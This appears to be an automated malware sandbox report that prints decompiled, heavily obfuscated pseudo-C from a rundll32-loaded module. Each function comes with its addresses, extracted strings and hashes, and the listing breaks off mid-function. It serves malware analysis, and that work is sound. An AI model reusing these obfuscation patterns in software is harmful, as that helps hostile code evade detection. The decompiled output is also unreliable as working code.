						_t268 = E00B28736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0xb3ca20; // 0x0
						E00B255D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0xb3ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E00B3838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00B25F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00b39b49
0x00b39b53
0x00b39b54
0x00b39b5b
0x00b39b5d
0x00b39b5e
0x00b39b5f
0x00b39b64
0x00b39b6c
0x00b39b6f
0x00b39b7b
0x00b39b7d
0x00b39b84
0x00b39b87
0x00b39b8b
0x00b39b93
0x00b39b9b
0x00b39ba3
0x00b39ba8
0x00b39bb0
0x00b39bb8
0x00b39bc5
0x00b39bc9
0x00b39bd1
0x00b39bd9
0x00b39be1
0x00b39be9
0x00b39bf1
0x00b39bf9
0x00b39c01
0x00b39c09
0x00b39c11
0x00b39c19
0x00b39c21
0x00b39c29
0x00b39c2e
0x00b39c36
0x00b39c3e
0x00b39c46
0x00b39c4e
0x00b39c56
0x00b39c5e
0x00b39c63
0x00b39c6b
0x00b39c73
0x00b39c7b
0x00b39c83
0x00b39c87
0x00b39c8f
0x00b39c97
0x00b39c9f
0x00b39ca7
0x00b39caf
0x00b39cb7
0x00b39cbc
0x00b39cc4
0x00b39cd4
0x00b39cd8
0x00b39ce0
0x00b39ce8
0x00b39cf0
0x00b39cf5
0x00b39cfd
0x00b39d09
0x00b39d0c
0x00b39d10
0x00b39d18
0x00b39d20
0x00b39d26
0x00b39d2b
0x00b39d33
0x00b39d3b
0x00b39d43
0x00b39d4b
0x00b39d5a
0x00b39d5d
0x00b39d61
0x00b39d69
0x00b39d71
0x00b39d76
0x00b39d7e
0x00b39d86
0x00b39d93
0x00b39d97
0x00b39d9f
0x00b39da7
0x00b39daf
0x00b39db7
0x00b39dbf
0x00b39dc7
0x00b39dcc
0x00b39dd4
0x00b39de4
0x00b39de8
0x00b39df0
0x00b39df8
0x00b39e04
0x00b39e09
0x00b39e0f
0x00b39e14
0x00b39e1c
0x00b39e24
0x00b39e2c
0x00b39e31
0x00b39e39
0x00b39e3e
0x00b39e46
0x00b39e4e
0x00b39e56
0x00b39e5e
0x00b39e66
0x00b39e72
0x00b39e75
0x00b39e7c
0x00b39e85
0x00b39e89
0x00b39e91
0x00b39e91
0x00b39e95
0x00b39e95
0x00b39e95
0x00b39e9b
0x00000000
0x00000000
0x00b3a010
0x00b3a04c
0x00b3a064
0x00b3a069
0x00b3a06e
0x00b3a07a
0x00b3a07f
0x00b3a085
0x00b3a0a5
0x00b3a0ae
0x00b3a0ae
0x00b39e91
0x00b39e91
0x00000000
0x00b39e91
0x00b39e91
0x00b3a070
0x00b39e91
0x00b39e91
0x00000000
0x00b39e91
0x00b39e91
0x00b3a018
0x00b3a038
0x00000000
0x00000000
0x00b3a03a
0x00000000
0x00b3a03a
0x00b3a020
0x00b3a08e
0x00b3a09e
0x00b3a0a4
0x00000000
0x00b3a08e
0x00b3a028
0x00000000
0x00000000
0x00b3a02a
0x00b3a02a
0x00b39ea1
0x00b39ff8
0x00b39ffd
0x00b3a000
0x00b39e91
0x00b39e91
0x00000000
0x00b39e91
0x00b39e91
0x00b39ead
0x00b39f9c
0x00b39fab
0x00b39fac
0x00b39fb0
0x00b39fb5
0x00b39fbb
0x00000000
0x00000000
0x00b39fc1
0x00b39fc3
0x00b39fcb
0x00b39fd2
0x00b39fd5
0x00b39fd9
0x00000000
0x00b39fd9
0x00b39eb9
0x00b39f8c
0x00000000
0x00b39f8c
0x00b39ec5
0x00b39f42
0x00b39f6f
0x00b39f74
0x00b39f79
0x00b39f81
0x00b39e91
0x00b39e91
0x00000000
0x00b39e91
0x00b39e91
0x00b39ecd
0x00b39efb
0x00b39f00
0x00b39f01
0x00b39f24
0x00b39f2b
0x00b39f31
0x00b39f34
0x00b39e91
0x00b39e91
0x00000000
0x00b39e91
0x00b39e91
0x00b39ed5
0x00000000
0x00000000
0x00b39eeb
0x00b39eec
0x00b39eed
0x00b39ef4
0x00b39ef4

Strings

0], xrefs: 00B39D10
!t, xrefs: 00B39D33
K., xrefs: 00B39BD1
b=, xrefs: 00B39C97
', xrefs: 00B39DD4
/,, xrefs: 00B39C63
$R, xrefs: 00B39E31
v+, xrefs: 00B39DBF

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 44c640ea243f489a29cf96c261779b0c9a60bd0b5888f175453a373354dcd4e1
Instruction ID: f502bde143ab74b2b7143aad08721b6d3203680c066dfe427711d6153e475c2f
Opcode Fuzzy Hash: 44c640ea243f489a29cf96c261779b0c9a60bd0b5888f175453a373354dcd4e1
Instruction Fuzzy Hash: FDD122711087408FE768CF65C88991FBBE1FB84748F208A1DF596862A0D7BAD949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B312E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00B312E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E00B2B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E00B228CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00B25AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E00B3A889(_v1068, _v1064,  &_v1040);
							E00B22BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00B27B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0xb3ca2c; // 0x505cc8
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E00B3889D(0xb3c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0xb3ca2c; // 0x505cc8
						_t197 = _t293 + 0x230; // 0x6c0053
						E00B2C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0xb3ca2c, _t257,  &_v520);
						_t256 = E00B32025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E00B363C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x00b312e2
0x00b312e8
0x00b312ef
0x00b312f4
0x00b312f9
0x00b31301
0x00b31309
0x00b31311
0x00b31319
0x00b31321
0x00b31332
0x00b3133c
0x00b31341
0x00b31347
0x00b3134f
0x00b31357
0x00b3135f
0x00b31367
0x00b3136f
0x00b31377
0x00b3137f
0x00b3138b
0x00b31390
0x00b31396
0x00b3139e
0x00b313a6
0x00b313ab
0x00b313b3
0x00b313bb
0x00b313c0
0x00b313c5
0x00b313c6
0x00b313ca
0x00b313d2
0x00b313da
0x00b313e2
0x00b313e7
0x00b313ef
0x00b313fc
0x00b31400
0x00b31405
0x00b3140d
0x00b31415
0x00b3141a
0x00b31422
0x00b3142a
0x00b31432
0x00b3143a
0x00b31442
0x00b3144a
0x00b31457
0x00b3145b
0x00b31463
0x00b31471
0x00b31475
0x00b3147d
0x00b31485
0x00b3148a
0x00b31492
0x00b3149a
0x00b314a2
0x00b314aa
0x00b314b2
0x00b314c3
0x00b314d0
0x00b314d9
0x00b314e1
0x00b314e9
0x00b314f9
0x00b314fd
0x00b31505
0x00b31509
0x00b3150e
0x00b31514
0x00b3151c
0x00b31524
0x00b3152d
0x00b31532
0x00b31538
0x00b31540
0x00b31548
0x00b31550
0x00b3155d
0x00b3155e
0x00b31562
0x00b3156a
0x00b31572
0x00b31580
0x00b31584
0x00b3158c
0x00b31594
0x00b3159c
0x00b315a0
0x00b315a5
0x00b315ad
0x00b315b5
0x00b315bd
0x00b315c5
0x00b315cd
0x00b315d5
0x00b315dd
0x00b315e5
0x00b315ed
0x00b315f5
0x00b315fd
0x00b315fd
0x00b31607
0x00b31713
0x00b31718
0x00000000
0x00b31718
0x00b31613
0x00b31747
0x00b31750
0x00b31752
0x00000000
0x00b31767
0x00b3161f
0x00b316b9
0x00b316bf
0x00b316e0
0x00b316f0
0x00b316f4
0x00b316fc
0x00b316fd
0x00b31702
0x00b31705
0x00000000
0x00b31705
0x00b3162b
0x00b3169b
0x00b316a2
0x00b316a9
0x00000000
0x00b316a9
0x00b3162d
0x00b3162f
0x00000000
0x00000000
0x00b31635
0x00b31642
0x00b31647
0x00b31659
0x00b31666
0x00b31670
0x00b31676
0x00b31689
0x00b3168e
0x00b31691
0x00b31691
0x00b31723
0x00b31728
0x00b3172a
0x00b3172a
0x00b3172a
0x00000000

Strings

ld8, xrefs: 00B31505
+, xrefs: 00B31492
j_, xrefs: 00B3139E
B, xrefs: 00B31405
IP, xrefs: 00B313CA
n2, xrefs: 00B31475
k, xrefs: 00B31309
m , xrefs: 00B313C0, 00B3170F, 00B316F0, 00B31659

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: 9d9d78d82181a2e1d276df01d1c38543d56f6fe121dce4f45c513f37c1f3e27a
Instruction ID: 1a768055abe890ea36be1e437c03cc03b611ad9f759f2928d07a6144e055e85d
Opcode Fuzzy Hash: 9d9d78d82181a2e1d276df01d1c38543d56f6fe121dce4f45c513f37c1f3e27a
Instruction Fuzzy Hash: 2EB13F71108380DFD368CF65C98A91BBBF5BBC4758F508A5EF196962A0C7B58A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B2B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E00B2E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E00B3889D(0xb3c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00B33EB3(_v52, _t241, _t218, _v76, _v56, 0xb3c9d0, _v80, _v28, 0xb3c9d0, _v84, 0xb3c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00B32025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E00B265A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0xb3ca2c; // 0x505cc8
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x00b2b75f
0x00b2b762
0x00b2b76c
0x00b2b776
0x00b2b77e
0x00b2b786
0x00b2b78e
0x00b2b793
0x00b2b798
0x00b2b7a0
0x00b2b7a7
0x00b2b7ae
0x00b2b7b2
0x00b2b7be
0x00b2b7c2
0x00b2b7c7
0x00b2b7cf
0x00b2b7d7
0x00b2b7df
0x00b2b7e7
0x00b2b7f6
0x00b2b7f9
0x00b2b805
0x00b2b809
0x00b2b811
0x00b2b819
0x00b2b826
0x00b2b829
0x00b2b82d
0x00b2b835
0x00b2b83d
0x00b2b84d
0x00b2b851
0x00b2b859
0x00b2b865
0x00b2b86a
0x00b2b870
0x00b2b875
0x00b2b87d
0x00b2b885
0x00b2b891
0x00b2b896
0x00b2b89c
0x00b2b8a4
0x00b2b8b1
0x00b2b8b2
0x00b2b8b6
0x00b2b8be
0x00b2b8c6
0x00b2b8ce
0x00b2b8dc
0x00b2b8e0
0x00b2b8e5
0x00b2b8ed
0x00b2b903
0x00b2b906
0x00b2b90a
0x00b2b90e
0x00b2b916
0x00b2b926
0x00b2b92a
0x00b2b92f
0x00b2b937
0x00b2b93f
0x00b2b94b
0x00b2b950
0x00b2b956
0x00b2b95e
0x00b2b966
0x00b2b96b
0x00b2b970
0x00b2b978
0x00b2b980
0x00b2b989
0x00b2b98c
0x00b2b990
0x00b2b998
0x00b2b9a0
0x00b2b9a8
0x00b2b9ad
0x00b2b9b2
0x00b2b9ba
0x00b2b9c2
0x00b2b9ca
0x00b2b9d2
0x00b2b9da
0x00b2b9e2
0x00b2b9ea
0x00b2b9f2
0x00b2b9f7
0x00b2b9ff
0x00b2ba07
0x00b2ba07
0x00b2ba09
0x00b2ba0a
0x00b2ba0f
0x00b2ba0f
0x00b2ba19
0x00b2bae9
0x00b2baf0
0x00b2baf3
0x00b2baf5
0x00b2bafd
0x00000000
0x00b2ba1f
0x00b2ba25
0x00b2ba67
0x00b2ba74
0x00b2ba79
0x00b2baaf
0x00b2bac8
0x00b2bacb
0x00b2bad0
0x00b2bad5
0x00b2bb24
0x00b2bb24
0x00000000
0x00b2ba27
0x00b2ba2d
0x00b2ba63
0x00000000
0x00b2ba2f
0x00b2ba35
0x00000000
0x00b2ba3b
0x00b2ba4f
0x00b2ba54
0x00b2ba35
0x00b2ba2d
0x00b2ba25
0x00b2ba57
0x00b2ba62
0x00b2ba62
0x00b2bb06
0x00b2bb0c
0x00b2bb17
0x00b2bb17
0x00b2bb1a
0x00000000
0x00000000
0x00b2bb14
0x00b2bb14
0x00b2bb14
0x00b2bb1c
0x00b2bb1c
0x00b2bb1f
0x00000000
0x00b2bb29
0x00b2bb29
0x00b2bb29
0x00000000
0x00b2bb35

Strings

Cw, xrefs: 00B2B9D2
AP, xrefs: 00B2B7CF
O1d#, xrefs: 00B2BB1F
,^, xrefs: 00B2B8E5
(%, xrefs: 00B2B835
O1d#, xrefs: 00B2BA1F
xq, xrefs: 00B2B978
R\, xrefs: 00B2B990

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: 6ed5d04bf5ca2c55702fb019e8d64ad4ae7f9c07c2da29113d08ad6dc4383cea
Instruction ID: 46d56c3f6758f54b03d658310e8820900f8eb423111b22995b7f6d7965dd1eed
Opcode Fuzzy Hash: 6ed5d04bf5ca2c55702fb019e8d64ad4ae7f9c07c2da29113d08ad6dc4383cea
Instruction Fuzzy Hash: 0AA123715093409BE358CF64D98A91FBBE2FBC4B58F10591DF189862A0DBB9C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B2EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B2EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00B2602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
